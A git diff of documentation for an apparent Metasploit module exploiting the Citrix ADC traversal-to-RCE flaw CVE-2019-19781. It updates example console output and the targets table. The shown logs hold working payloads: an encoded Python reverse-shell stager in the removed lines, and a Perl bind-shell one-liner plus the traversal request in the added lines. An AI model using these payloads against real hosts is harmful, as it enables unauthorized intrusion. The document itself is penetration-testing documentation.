diff --git a/documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md b/documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md
index 780a88bcf9..cd34c875f3 100644
--- a/documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md
+++ b/documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md
@@ -9,25 +9,39 @@ This `/vpns/` directory is interesting because it contains Perl code. The script
 A malicious attacker can execute arbitrary commands remotely by creating a corrupted xml file who use `Perl Template Toolkit` in part of payload.
 
 ```
-msf5 exploit(linux/http/citrix_dir_traversal_rce) > set rhosts [IP]
-rhosts => XXX.XXX.XXX.XXX
-msf5 exploit(linux/http/citrix_dir_traversal_rce) > set lhost [IP]
-lhost => XXX.XXX.XXX.XXX
-msf5 exploit(linux/http/citrix_dir_traversal_rce) > set verbose true
-verbose => true
 msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
 
-[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444 
-[+] The target appears to be vulnerable.
-[*] Sending python/meterpreter/reverse_tcp command payload
-[*] Generated command payload: import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ1hYWC5YWFguWFhYLlhYWCcsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))
-[*] Bookmark Added.
-[*] Sending stage (53755 bytes) to XXX.XXX.XXX.XXX
-[*] Meterpreter session 1 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:42881) at 2020-01-13 12:02:41 +0400
-[+] Deleted /var/tmp/netscaler/portal/templates/hBgGdPlkypbfZMvq.xml.ttc2
-[+] Deleted /netscaler/portal/templates/hBgGdPlkypbfZMvq.xml
+[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[+] The target appears to be vulnerable
+[*] Yeeting cmd/unix/generic payload at 127.0.0.1:8080
+[*] Generated payload: id
+uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
 
-meterpreter > 
+[!] This exploit may require manual cleanup of '/netscaler/portal/templates/mdjLHiHtIYmh.xml' on the target
+[!] This exploit may require manual cleanup of '/var/tmp/netscaler/portal/templates/mdjLHiHtIYmh.xml.ttc2' on the target
+[*] Exploit completed, but no session was created.
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl
+payload => cmd/unix/bind_perl
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
+
+[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[+] The target appears to be vulnerable
+[*] Yeeting cmd/unix/bind_perl payload at 127.0.0.1:8080
+[*] Generated payload: perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
+[!] No response to GET KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml request
+[*] Started bind TCP handler against 127.0.0.1:4444
+[*] Command shell session 1 opened (127.0.0.1:51106 -> 127.0.0.1:4444) at 2020-01-13 20:50:45 -0600
+[+] Deleted /netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml
+[+] Deleted /var/tmp/netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml.ttc2
+
+id
+uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
 ```
 
 ## Verification Steps
@@ -43,11 +57,10 @@ meterpreter >
 ## Targets
 
 ```
-  Id  Name
-  --  ----
-  0   Python (meterpreter)
-  1   Unix (remote shell)
-  2   Unix (command-line)
+Id  Name
+--  ----
+0   Python
+1   Unix Command
 ```
 
 ## Advanced options
@@ -58,6 +71,6 @@ Override check result.
 
 ## References
 
-  1. <https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>
-  2. <https://www.exploit-db.com/exploits/47901>
-  3. <https://www.exploit-db.com/exploits/47902>
+1. <https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>
+2. <https://www.exploit-db.com/exploits/47901>
+3. <https://www.exploit-db.com/exploits/47902>